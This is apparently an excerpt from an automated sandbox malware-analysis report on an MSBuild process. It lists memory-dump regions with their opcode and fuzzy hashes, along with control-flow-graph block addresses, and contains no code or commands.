                      • Instruction ID: d36e05b24b5a8388acde2c113b99d21f913b19fe779b1da3cf35b972082344ce
                      • Opcode Fuzzy Hash: 59f3b9b175ce6fd016d8be00e9c28da31cbb72ca7333caa4d9b05a3474baa16e
                      • Instruction Fuzzy Hash: 0372D0759012289FCB65DF64CD84BEDBBB6BF89300F0585EAE509A7261DB319E81CF40
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581185222.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5bc0000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 09745a80adce3c5ece239e7a7943d17276c5583f8bc8de17acc440b1851bda92
                      • Instruction ID: 5ec5fd5c69d9038b9b25c2ba037284556c9464150a220b6212904c50e690bff4
                      • Opcode Fuzzy Hash: 09745a80adce3c5ece239e7a7943d17276c5583f8bc8de17acc440b1851bda92
                      • Instruction Fuzzy Hash: AB422870B002058FDB15DF68C498AAEBBF2FF89340F5584A8E5569B3A5DB34EC41CB94
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581185222.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5bc0000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: eaf11b564a863fcafca909c3f3ac3c5d3c1e30269d51e4afe2fad998afb3830b
                      • Instruction ID: 93bbd06560ec9fa1caa34402cbd2b077f7a3f3da5d0601379e2e6a491d822741
                      • Opcode Fuzzy Hash: eaf11b564a863fcafca909c3f3ac3c5d3c1e30269d51e4afe2fad998afb3830b
                      • Instruction Fuzzy Hash: B5326631A007018FCB28DF68D588A6ABBF2FF85345F5448EDE5068B2A1DB35F885CB55
                      Memory Dump Source
                      • Source File: 00000002.00000002.4563369442.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_11b0000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7feb09e281250cc5a2ceead7d44fb55c7ed11db3891283e8ff92dec9c4fd8260
                      • Instruction ID: eda9670ddfd35da1ca3dd49cae8d577b2bd5a3777cfa19da86562b1bb78a1d34
                      • Opcode Fuzzy Hash: 7feb09e281250cc5a2ceead7d44fb55c7ed11db3891283e8ff92dec9c4fd8260
                      • Instruction Fuzzy Hash: 8B42CCB4D052288FDB69CF65C990BEDBBB2BB89300F1081EAD549A7290DB355EC5CF50
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581106317.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5b60000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: dda16c8de6825c21c2e852f04e9e8964aa96dc390d4b0fa0e0f189f75d62e417
                      • Instruction ID: dbd98b04f6e7d299ac20260b493e55964716b8e706dab7a9ffecf122ecc7d7b1
                      • Opcode Fuzzy Hash: dda16c8de6825c21c2e852f04e9e8964aa96dc390d4b0fa0e0f189f75d62e417
                      • Instruction Fuzzy Hash: E6F1AF31B052159FDB259F648854B7EBEB6FB88740F54806AE946DB284CF39EC42CBD0
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581361946.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5c00000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f84c01ad32444af1f75fddc2308b34bef4e2b720b01cf0c8f02049339fe3de7e
                      • Instruction ID: f07070e17eb25be40878e5269d7de3bdd1716a19a968a6d0bb87750d6201c4ad
                      • Opcode Fuzzy Hash: f84c01ad32444af1f75fddc2308b34bef4e2b720b01cf0c8f02049339fe3de7e
                      • Instruction Fuzzy Hash: 7E02D274A052288FDB68DF24CD84BDABBB6BF49304F0484EAD50CA7291DB319E85CF50
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581361946.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5c00000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 244b15d48a98996d5f501a807eea867e8c8eb0682bb8fcb66bbc68193c535688
                      • Instruction ID: ac67d647abd544629a67f0164d9ea181444cc81bdfd4e36889eeccb8fbec8bba
                      • Opcode Fuzzy Hash: 244b15d48a98996d5f501a807eea867e8c8eb0682bb8fcb66bbc68193c535688
                      • Instruction Fuzzy Hash: 1002F470D012198FDB25CFA8C890BEDBBB2BF89300F5095AAD549AB395DB345E85CF50
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581185222.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5bc0000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 674a66c6e5b3e29162c35e769dc207181fd18afcf3939aafddfe173bf10dab28
                      • Instruction ID: 9b98a9fe4abddbb43ec919e8bf8e2e04c41d00b43301519ecd0ae293472ebdb7
                      • Opcode Fuzzy Hash: 674a66c6e5b3e29162c35e769dc207181fd18afcf3939aafddfe173bf10dab28
                      • Instruction Fuzzy Hash: BD020575A046058FDB25CFA9C584AAABBF2FF88300F1485ADE4569B761DB34F881CF44
                      Memory Dump Source
                      • Source File: 00000002.00000002.4563369442.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_11b0000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8d140a6f3af23546ae5a730e23c1a3a1e0ec3670cb7b59015029b9e8f44b6a89
                      • Instruction ID: 151ba47175cb957c90cdea2065542951b2518554b891fa5c399251530f93573e
                      • Opcode Fuzzy Hash: 8d140a6f3af23546ae5a730e23c1a3a1e0ec3670cb7b59015029b9e8f44b6a89
                      • Instruction Fuzzy Hash: 10127274E002188FDB68DFA9D984BDDBBB2BF49300F1081AAD549A7355DB349A85CF50
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581519862.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5d00000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0366abb4a05362295282e9a00ffa27d42f5d371df3ad016ec592b95e303888c3
                      • Instruction ID: 2beae810d765ce15428836ca5b476ee13fdd64b70bbf167f2bda80f57c35e23a
                      • Opcode Fuzzy Hash: 0366abb4a05362295282e9a00ffa27d42f5d371df3ad016ec592b95e303888c3
                      • Instruction Fuzzy Hash: 5F029F74A01259CFCB54CFA8C884ADDBBB6FF49320F1495AAD409AB369D730E985CF50
                      Memory Dump Source
                      • Source File: 00000002.00000002.4563369442.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_11b0000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 95590980c2840cd81535317e8ca6d38d6e113d9abb43dd4b3fd38e5f9a151632
                      • Instruction ID: ad5007170131e5ffd4e81e74f3d349818010064b3aa94e81f0c493bd9dad9d4b
                      • Opcode Fuzzy Hash: 95590980c2840cd81535317e8ca6d38d6e113d9abb43dd4b3fd38e5f9a151632
                      • Instruction Fuzzy Hash: 31F1CF74D01229CFEB68DF65C884BEDBBB2BB89300F1481EAD509A7294DB345E85CF51
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581519862.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5d00000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1d8fb18086da32933b8873b22f9a30c2f653fe72338f7bb78e5ea3b9c4225a84
                      • Instruction ID: 99f28fd655c35377cc54914ba1bbcc31500c7bc880484991f67b9ba18b05f9a4
                      • Opcode Fuzzy Hash: 1d8fb18086da32933b8873b22f9a30c2f653fe72338f7bb78e5ea3b9c4225a84
                      • Instruction Fuzzy Hash: 19C1C274D05228CFDB24DFA5C984BEDBBB2FF49300F1491AAD809A7295DB359985CF10
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581519862.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5d00000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e70a5810917bd8ef31b10c3bbe496a65a65d7a93c09cb5aaa97b59768fbf101f
                      • Instruction ID: 0cbee1ba4bec703b8c5b7118651f308f767d4abfda8bfb959c7ee99f4cc51527
                      • Opcode Fuzzy Hash: e70a5810917bd8ef31b10c3bbe496a65a65d7a93c09cb5aaa97b59768fbf101f
                      • Instruction Fuzzy Hash: 22B1E274D04228DFDB28DFA5C8847EDBBB2BF89300F6491AAD409A7395DB345985CF10
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581519862.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5d00000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cdf818c2ada763316e8c9fb2f9831ebf60adc38e59d8f7caa722e35f70dacb41
                      • Instruction ID: e35aa05551ed056ef7db812b3148f792020247a1f51fb9af5431fe9c72744892
                      • Opcode Fuzzy Hash: cdf818c2ada763316e8c9fb2f9831ebf60adc38e59d8f7caa722e35f70dacb41
                      • Instruction Fuzzy Hash: 8FB1C274E04228CFDB24DFA6C8847EDBBB2BF89300F1495AAD409A73A5DB355985CF50
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581361946.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5c00000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7273c91cfda6b5680c5a79e05c2a1be4165345bbf0b3b78329176bf190218c82
                      • Instruction ID: 9c94d00b9679bab015fb0a1124f127116507302b1fd73cec4ce052348693eabd
                      • Opcode Fuzzy Hash: 7273c91cfda6b5680c5a79e05c2a1be4165345bbf0b3b78329176bf190218c82
                      • Instruction Fuzzy Hash: CCB1A074E002298FDB54CFA9C984BADBBF2BF48304F14D5A9D918A7351DB349A85CF50
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581361946.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5c00000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3974e632305898aa8c4bd140012a0d0114e58c80ce9825ae5fdc84a4ab106d82
                      • Instruction ID: 9468fd749414fe995dac69676a59b6595b6df0101f7f90aa557285304913148e
                      • Opcode Fuzzy Hash: 3974e632305898aa8c4bd140012a0d0114e58c80ce9825ae5fdc84a4ab106d82
                      • Instruction Fuzzy Hash: 42A17074E00218DFDB54CFAAD984A9DFBF2BF89310F1491AAE809A7355DB349981CF50
                      Memory Dump Source
                      • Source File: 00000002.00000002.4563369442.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_11b0000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f35a28bca8953a562af3cf3d3df820def61bc2217d8271670e70feabff7018e8
                      • Instruction ID: 3bf78c5691186159568ede36bcf9eed9deafe9f5213fbb982c01dfdd7f0a8895
                      • Opcode Fuzzy Hash: f35a28bca8953a562af3cf3d3df820def61bc2217d8271670e70feabff7018e8
                      • Instruction Fuzzy Hash: 33A19575E002188FDB18DFAAD984ADDBBF2BF89304F14C1AAD449AB255DB349985CF00
                      Memory Dump Source
                      • Source File: 00000002.00000002.4563369442.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_11b0000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f3ce45f2bf7ea956d690b82331b24e857959b6849066c1ed823710bcab67425e
                      • Instruction ID: cba5368059cdb9b4bd18c8456e32c07dcb09171ebf452240802699db95adbe83
                      • Opcode Fuzzy Hash: f3ce45f2bf7ea956d690b82331b24e857959b6849066c1ed823710bcab67425e
                      • Instruction Fuzzy Hash: 59719C74D01218CFDB18CFA9C8846EDFBF2BF89301F24906AD40AAB255DB349985CF54
                      Memory Dump Source
                      • Source File: 00000002.00000002.4563369442.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_11b0000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d67d92fd1067274e5803f0559bbecb16fb180d9a69513b354f8e47982d150c3e
                      • Instruction ID: 8842a3de7bedda040601b2379af947beb3933aa6882aa0915f09af3f598b11c2
                      • Opcode Fuzzy Hash: d67d92fd1067274e5803f0559bbecb16fb180d9a69513b354f8e47982d150c3e
                      • Instruction Fuzzy Hash: AB71C374E05208CFDB18DFAAD584ADEBBF2BF89304F24D12AD408AB255DB749946CF44
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581519862.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5d00000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 702042160e345e317c196bab6b8b6fd180c9656a440af1efa24d60ce103db5c0
                      • Instruction ID: 755ea5dc1dacf3b42900f61c0381858dcb63097049433a97c911fed135d78ae8
                      • Opcode Fuzzy Hash: 702042160e345e317c196bab6b8b6fd180c9656a440af1efa24d60ce103db5c0
                      • Instruction Fuzzy Hash: F461DE74E05228CFDB18DFAAD9846EDBBF2BF89300F24952AD419BB294D7349945CF10
                      Memory Dump Source
                      • Source File: 00000002.00000002.4563369442.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_11b0000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 70f618e4ee02106007b600e5ce01f603de9d56f5e0f8d7cbc043e8a47ec3c8ef
                      • Instruction ID: 137b30508d69b6cd15b1338711e66ca4d707407f8bf6ae1482ab375cf54d4097
                      • Opcode Fuzzy Hash: 70f618e4ee02106007b600e5ce01f603de9d56f5e0f8d7cbc043e8a47ec3c8ef
                      • Instruction Fuzzy Hash: F5618475E056188BDB29CF6AC980A89FBF7BFC9300F15D1AAD44CA7215DB309A81CF50
                      Memory Dump Source
                      • Source File: 00000002.00000002.4563369442.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_11b0000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: fbf6ba0fc1d47270c4f244655ede1f40e00f1368f57bdbe120830eeb1318bdba
                      • Instruction ID: 07f49b052af7317a3b4a3d3aaaf8515c31c020168044baf80db5210132a00a80
                      • Opcode Fuzzy Hash: fbf6ba0fc1d47270c4f244655ede1f40e00f1368f57bdbe120830eeb1318bdba
                      • Instruction Fuzzy Hash: 4751D274D05209CFDB08DFAAD9806EDFBF2BF89300F14912AD815AB255D738A986CF54
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581361946.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5c00000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 84fc7bfb894bae69701deb47570d6d6146725c505a01f537298457dc51e31042
                      • Instruction ID: ad1c104acd9606e74fe3861208988fcb746f7101b1212475ac2dcee7d1235cea
                      • Opcode Fuzzy Hash: 84fc7bfb894bae69701deb47570d6d6146725c505a01f537298457dc51e31042
                      • Instruction Fuzzy Hash: B0419B71D016298BDB69CF6BCC447DAB6F7AFC8300F04C1FA941CA6254DB741A858F40
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581361946.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5c00000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: fa8c3dadb6dfe76ffe9eaf46b42b74e625fc33a5baf7662adb723ccf402891af
                      • Instruction ID: e3179fc9115722067c383573a2bca95827cae28f2f2b3195c151a9d6ef914f3e
                      • Opcode Fuzzy Hash: fa8c3dadb6dfe76ffe9eaf46b42b74e625fc33a5baf7662adb723ccf402891af
                      • Instruction Fuzzy Hash: 25219471E006589BDB18CFABD8446DDFBF3AFC8310F14C53AD819AA264EB394946CB10

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1602 5bc3310-5bc3322 1603 5bc34ad-5bc34d9 1602->1603 1604 5bc3328-5bc3339 1602->1604 1608 5bc34e0-5bc3518 1603->1608 1607 5bc333f-5bc3388 1604->1607 1604->1608 1633 5bc338a-5bc338e 1607->1633 1634 5bc3394-5bc33bb 1607->1634 1612 5bc351e-5bc3525 1608->1612 1613 5bc3838-5bc3864 1608->1613 1615 5bc3547-5bc355c 1612->1615 1616 5bc3527-5bc3545 1612->1616 1636 5bc386b-5bc3897 1613->1636 1624 5bc382e-5bc3835 1615->1624 1616->1615 1623 5bc3561-5bc35b3 1616->1623 1638 5bc35bd-5bc35bf 1623->1638 1639 5bc35b5-5bc35b8 1623->1639 1633->1634 1637 5bc3496-5bc34aa 1633->1637 1655 5bc33bd-5bc33bf 1634->1655 1656 5bc33c1 1634->1656 1653 5bc389e-5bc38d7 1636->1653 1640 5bc372e-5bc373b 1638->1640 1641 5bc35c5-5bc35ca 1638->1641 1639->1624 1640->1636 1644 5bc3741-5bc3743 1640->1644 1646 5bc35d3-5bc35d5 1641->1646 1648 5bc3745-5bc374a 1644->1648 1649 5bc3752-5bc3758 1644->1649 1651 5bc3728-5bc372c 1646->1651 1652 5bc35db-5bc35e0 1646->1652 1648->1649 1649->1653 1654 5bc375e-5bc3766 1649->1654 1651->1640 1657 5bc35fa-5bc35ff 1652->1657 1658 5bc35e2-5bc35f5 1652->1658 1675 5bc38d9 1653->1675 1676 5bc38e0-5bc38e3 1653->1676 1660 5bc379e-5bc37a2 1654->1660 1661 5bc3768-5bc376c 1654->1661 1662 5bc33c8-5bc33da 1655->1662 1656->1662 1657->1640 1663 5bc3605-5bc360d 1657->1663 1658->1624 1667 5bc37a8 1660->1667 1668 5bc37a4-5bc37a6 1660->1668 1664 5bc376e-5bc3781 1661->1664 1665 5bc3786-5bc3799 1661->1665 1677 5bc33dc-5bc33e0 1662->1677 1678 5bc33f5-5bc33f7 1662->1678 1673 5bc360f-5bc3611 1663->1673 1674 5bc3685-5bc3687 1663->1674 1664->1624 1665->1624 1669 5bc37ad-5bc37af 1667->1669 1668->1669 1679 5bc37c6-5bc37db 1669->1679 1680 5bc37b1-5bc37c4 1669->1680 1681 5bc3617-5bc3619 1673->1681 1682 5bc3613-5bc3615 1673->1682 1684 5bc369f-5bc36a3 1674->1684 1685 5bc3689-5bc369a 1674->1685 1675->1676 1686 5bc399d-5bc39a3 1675->1686 1687 5bc3921-5bc392d 1675->1687 1688 5bc3902-5bc3908 1675->1688 1689 5bc3932-5bc393e 1675->1689 1690 5bc3962-5bc3968 1675->1690 1691 5bc38f3-5bc38fd 1675->1691 1692 5bc38e5-5bc38e8 1676->1692 1693 5bc3943-5bc394c 1676->1693 1677->1678 1695 5bc33e2-5bc33eb 1677->1695 1696 5bc3419-5bc341b 1678->1696 1697 5bc33f9-5bc3400 1678->1697 1730 5bc381c-5bc3829 1679->1730 1731 5bc37dd-5bc381a 1679->1731 1680->1624 1699 5bc3628-5bc362e 1681->1699 1700 5bc361b-5bc3620 1681->1700 1698 5bc367d-5bc3683 1682->1698 1684->1640 1710 5bc36a9-5bc36ab 1684->1710 1685->1624 1711 5bc39ab-5bc39b7 1686->1711 1712 5bc39a5 1686->1712 1703 5bc39c2-5bc39cb 1687->1703 1704 5bc390a 1688->1704 1705 5bc3910-5bc391c 1688->1705 1689->1703 1708 5bc396a 1690->1708 1709 5bc3970-5bc397c 1690->1709 1691->1703 1701 5bc397e-5bc3987 1692->1701 1702 5bc38ee-5bc39bf 1692->1702 1706 5bc394e 1693->1706 1707 5bc3954-5bc3960 1693->1707 1762 5bc33ed call 5bc3310 1695->1762 1763 5bc33ed call 5bc3302 1695->1763 1719 5bc348c-5bc3493 1696->1719 1720 5bc341d-5bc3444 1696->1720 1716 5bc3409 1697->1716 1717 5bc3402-5bc3407 1697->1717 1698->1673 1698->1674 1699->1653 1721 5bc3634-5bc3640 1699->1721 1700->1699 1723 5bc398f-5bc399b 1701->1723 1724 5bc3989 1701->1724 1704->1705 1705->1703 1706->1707 1707->1703 1708->1709 1709->1703 1713 5bc36ad-5bc36af 1710->1713 1714 5bc371e-5bc3724 1710->1714 1711->1703 1712->1711 1726 5bc36be-5bc36c4 1713->1726 1727 5bc36b1-5bc36b6 1713->1727 1714->1710 1732 5bc3726 1714->1732 1729 5bc340e-5bc3417 1716->1729 1717->1729 1746 5bc344a-5bc3451 1720->1746 1747 5bc3446-5bc3448 1720->1747 1733 5bc364f-5bc3655 1721->1733 1734 5bc3642-5bc3647 1721->1734 1723->1703 1724->1723 1726->1653 1735 5bc36ca-5bc36d6 1726->1735 1727->1726 1728 5bc33f3 1728->1678 1729->1696 1730->1624 1731->1730 1732->1640 1733->1653 1737 5bc365b-5bc3670 1733->1737 1734->1733 1738 5bc36d8-5bc36dd 1735->1738 1739 5bc36e5-5bc36eb 1735->1739 1748 5bc3677-5bc3679 1737->1748 1749 5bc3672-5bc3675 1737->1749 1738->1739 1739->1653 1742 5bc36f1-5bc3706 1739->1742 1742->1714 1753 5bc3708-5bc3719 1742->1753 1751 5bc3453-5bc348a 1746->1751 1747->1751 1748->1698 1752 5bc367b 1748->1752 1749->1698 1751->1719 1752->1698 1753->1624 1762->1728 1763->1728
                      Strings
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581185222.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5bc0000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID: 7$Hp
                      • API String ID: 0-4220717489
                      • Opcode ID: 8f00a4a0d5e53de70965276042185dcec05ba629cf90973536e859e9e89629c5
                      • Instruction ID: a50014c6846824d3e6b435cd3a130df2e8d8b7a0b7066e1a09cc6b1a05472fb8
                      • Opcode Fuzzy Hash: 8f00a4a0d5e53de70965276042185dcec05ba629cf90973536e859e9e89629c5
                      • Instruction Fuzzy Hash: 85228971A002059FDB15CF64C884BAEBBF6FF89300F94C8A9D4469B295DB75E841CB98

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1877 5b63750-5b63762 1878 5b63764-5b63785 1877->1878 1879 5b6378c-5b63790 1877->1879 1878->1879 1880 5b63792-5b63794 1879->1880 1881 5b6379c-5b637ab 1879->1881 1880->1881 1882 5b637b7-5b637e3 1881->1882 1883 5b637ad 1881->1883 1887 5b63a04-5b63a4f 1882->1887 1888 5b637e9-5b637ef 1882->1888 1883->1882 1922 5b63a65-5b63a71 1887->1922 1923 5b63a51 1887->1923 1889 5b637f5-5b637fb 1888->1889 1890 5b638b8-5b638bc 1888->1890 1889->1887 1892 5b63801-5b63810 1889->1892 1893 5b638e1-5b638ea 1890->1893 1894 5b638be-5b638c7 1890->1894 1896 5b63816-5b63822 1892->1896 1897 5b63897-5b638a0 1892->1897 1899 5b6390f-5b63912 1893->1899 1900 5b638ec-5b638f8 1893->1900 1894->1887 1898 5b638cd-5b638df 1894->1898 1896->1887 1903 5b63828-5b6383f 1896->1903 1897->1887 1902 5b638a6-5b638b2 1897->1902 1901 5b63915-5b6391b 1898->1901 1899->1901 1979 5b638fa call 5b63750 1900->1979 1980 5b638fa call 5b63741 1900->1980 1901->1887 1905 5b63921-5b63936 1901->1905 1902->1889 1902->1890 1906 5b63841 1903->1906 1907 5b6384b-5b6385d 1903->1907 1905->1887 1910 5b6393c-5b6394e 1905->1910 1906->1907 1907->1897 1914 5b6385f-5b63865 1907->1914 1910->1887 1913 5b63954-5b63961 1910->1913 1912 5b63900-5b6390c 1912->1899 1913->1887 1916 5b63967-5b6397e 1913->1916 1917 5b63867 1914->1917 1918 5b63871-5b63877 1914->1918 1916->1887 1924 5b63984-5b6399c 1916->1924 1917->1918 1918->1887 1920 5b6387d-5b63894 1918->1920 1926 5b63a73 1922->1926 1927 5b63a7d-5b63a99 1922->1927 1925 5b63a54-5b63a56 1923->1925 1924->1887 1928 5b6399e-5b639a9 1924->1928 1929 5b63a9a-5b63ad7 1925->1929 1930 5b63a58-5b63a63 1925->1930 1926->1927 1931 5b639fa-5b63a01 1928->1931 1932 5b639ab-5b639b5 1928->1932 1940 5b63af3-5b63aff 1929->1940 1941 5b63ad9-5b63adc 1929->1941 1930->1922 1930->1925 1932->1931 1936 5b639b7-5b639cd 1932->1936 1942 5b639cf 1936->1942 1943 5b639d9-5b639f2 1936->1943 1945 5b63b01 1940->1945 1946 5b63b0b-5b63b0d 1940->1946 1944 5b63adf-5b63af1 1941->1944 1942->1943 1943->1931 1944->1940 1944->1944 1945->1946 1948 5b63b15-5b63b30 1946->1948 1951 5b63ba4-5b63baa 1948->1951 1952 5b63b32-5b63b38 1948->1952 1954 5b63bf7-5b63c11 1951->1954 1955 5b63bac-5b63baf 1951->1955 1952->1951 1953 5b63b3a-5b63b3d 1952->1953 1956 5b63c14-5b63c39 1953->1956 1957 5b63b43-5b63b50 1953->1957 1955->1956 1958 5b63bb1-5b63bbe 1955->1958 1969 5b63c47-5b63c4b 1956->1969 1970 5b63c3b-5b63c41 1956->1970 1960 5b63b52-5b63b7c 1957->1960 1961 5b63b9e-5b63ba2 1957->1961 1962 5b63bc0-5b63bd8 1958->1962 1963 5b63bf1-5b63bf5 1958->1963 1964 5b63b7e 1960->1964 1965 5b63b88-5b63b9b 1960->1965 1961->1951 1961->1953 1962->1956 1967 5b63bda-5b63bed 1962->1967 1963->1954 1963->1955 1964->1965 1965->1961 1967->1963 1974 5b63c71-5b63c76 1969->1974 1975 5b63c4d-5b63c5d 1969->1975 1972 5b63c45 1970->1972 1973 5b63c43 1970->1973 1972->1969 1973->1969 1975->1974 1977 5b63c5f-5b63c70 1975->1977 1979->1912 1980->1912
                      Strings
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581106317.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5b60000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID: (p$d
                      • API String ID: 0-1637876577
                      • Opcode ID: 1f2bacada90b14c864311579ae5787302aed044612b498846e388f90c90229ac
                      • Instruction ID: c126a00d15aa53793042ee4b41704e324b281eae25f0f06eb640909ed3a4df73
                      • Opcode Fuzzy Hash: 1f2bacada90b14c864311579ae5787302aed044612b498846e388f90c90229ac
                      • Instruction Fuzzy Hash: 57025834A006058FDB14CF59C484A6AFBF2FF88314B25CAA9D45A9B765DB34FC46CB90

                      Control-flow Graph

                      • Executed
                      • Not Executed
